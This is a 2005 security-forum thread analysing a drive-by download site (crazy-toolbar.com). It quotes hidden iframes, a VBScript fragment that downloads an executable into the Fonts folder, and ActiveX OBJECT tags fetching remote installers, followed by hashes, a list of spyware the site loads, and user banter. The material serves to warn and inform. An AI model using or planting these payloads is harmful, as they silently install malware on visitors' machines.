  <iframe src="http://crazy-toolbar.com/new10/web.php?account=liter" width="1" height="1">
  <iframe src="http://crazy-toolbar.com/new7/web.php?account=liter" width="1" height="1">
Set shell=CreateObject("WScript.Shell")

ddd = shell.SpecialFolders("Fonts") + "\" + "web.exe"

set dot=CreateObject("Msxml2.XMLHTTP")

dot.Open "GET", "hxxp://crazy-toolbar.com/soft.php?login=liter&num=7

  <iframe src="http://crazy-toolbar.com/new6/web.php?account=liter" width="1" height="1">
<body>
  <script language="javascript">
   document.write("<OBJECT NAME='web' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='http://crazy-toolbar.com/liter/61/soft.exe'>");
   document.write("<OBJECT NAME='web' CLASSID='CLSID:527196a4-b1a3-4647-931d-37ba5af23037' CODEBASE='http://crazy-toolbar.com/liter/62/soft.exe'>");
  </script>
 </body>

3/25/2005: MD5: F97E7F7049525D57C175052110B1B7FF

6/9/2005  MD5: BBAAF909211C70948DE2486B4D44F915
MD5: BBAAF909211C70948DE2486B4D44F915


Then, bobince from DoxDesk chimed in with:
The exploits at crazy-toolbar also load iSrvs/Delprot (iSearch, iDownload), Transponder/Aurora (Nail, DirectRevenue), ISTbar/YSB, ILookup/NSL29, SpySherriff, a couple of backdoors and some new stuff from Matcash I hadn't seen before. Also it puts the entire internet in various types of Trusted Zone so that anyone can load any old malware in the future.

To Be Avoided.


Got that from this thread

Now, do I have to tell you what happened when I went there? :lol:

Well, I got one alert from Avast! asking me what to do with a file which was a Trojan Horse TR/Ex[ploit.MS05-002.Ani.A


And that was it, I was able to navigate around the site with no problems. All subsequent scans came up negative, no malwares or anything found. **@ Take this !*!* malwares, and this too FU
Image

User avatar
JeanInMontana
Posts: 2570
Joined: Wed Feb 02, 2005 9:47 am
Gender: Female
experience: I know the functions, OS settings, registry tweaks and more
PC time: More than 4 hours a day
Location: South Central Montana USA
Contact:

Postby JeanInMontana » Mon Jun 13, 2005 3:48 pm

Well Mr. Merc, I think you are bound to get bored soon with teasing these sites. When are you going to start figuring out how to get rid of the stuff??? Hmmmm???
Image Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Postby TeMerc » Mon Jun 13, 2005 4:29 pm

JeanInMontana wrote:Well Mr. Merc, I think you are bound to get bored soon with teasing these sites. When are you going to start figuring out how to get rid of the stuff??? Hmmmm???

Hmmmm............I think I'm already fairly well versed in that, havn't I Mz. Obfuscated? ;) rofl
Image

User avatar
JeanInMontana
Posts: 2570
Joined: Wed Feb 02, 2005 9:47 am
Gender: Female
experience: I know the functions, OS settings, registry tweaks and more
PC time: More than 4 hours a day
Location: South Central Montana USA
Contact:

Postby JeanInMontana » Mon Jun 13, 2005 4:33 pm

Oh you misundertake me. I mean writing some fixes for some of the new stuff. :roll: Those new infections so obfuscate no one has a fix. Ya know let some of that stuff on the box and get rid of it! Live a little.
Image Image

User avatar
clif_notes
Freeware Research Specialist
Freeware Research Specialist
Posts: 562
Joined: Wed Feb 02, 2005 12:13 am
Location: OHIO, USA
Contact:

Postby clif_notes » Mon Jun 13, 2005 8:44 pm

I second that. I've intentionally infected myself before just to see what I could do about it, but I'm afraid to do it now, being limited to one machine.

I think it'd be fun :!:
Image

http://clifnotes.net

Devoted to promoting freeware and free information

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Postby TeMerc » Fri Aug 05, 2005 11:39 pm

I'm going to continue with my XP SP 2 tsting for a bit more.

Then I'll begin to infect myself for schooling and such. I am quite confident it will be fun.
Image


Return to “TeMerc Test Box”

Who is online

Users browsing this forum: No registered users and 1 guest